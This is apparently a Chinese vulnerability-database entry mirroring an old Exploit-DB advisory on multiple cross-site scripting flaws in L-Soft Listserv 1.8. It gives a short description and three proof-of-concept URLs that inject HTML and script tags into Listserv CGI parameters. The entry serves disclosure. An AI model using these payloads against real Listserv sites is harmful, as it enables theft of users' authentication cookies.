L-Soft 1.8 - Listserv Multiple Cross-Site Scripting Vulnerabilities

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1054329 漏洞类型
发布时间 2003-12-26 更新时间 2003-12-26
CVE编号 N/A CNNVD-ID N/A
漏洞平台 CGI CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/23485
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/9307/info

Multiple cross-site scripting vulnerabilities have been reported in L-Soft Listserv. An attacker may exploit these issues by embedding hostile HTML and script code in a link to a site hosting the software. This could permit theft of cookie-based authentication credentials or other attacks. These issues could also provide an attack vector for latent vulnerabilities in web browser software. 

http://www.example.com/SCRIPTS/WA-MSD.EXE?A0=<IMG%
20SRC=javascript:document['write'](location)>&T=malware is in the
zone<object>

http://www.example.com/SCRIPTS/WA-USIAINFO.EXE?
A1=<img>ind0312d&L=dosback

http://www.example.com/Scripts/wa-demo.exe?A1=ind9807&L=demo<img>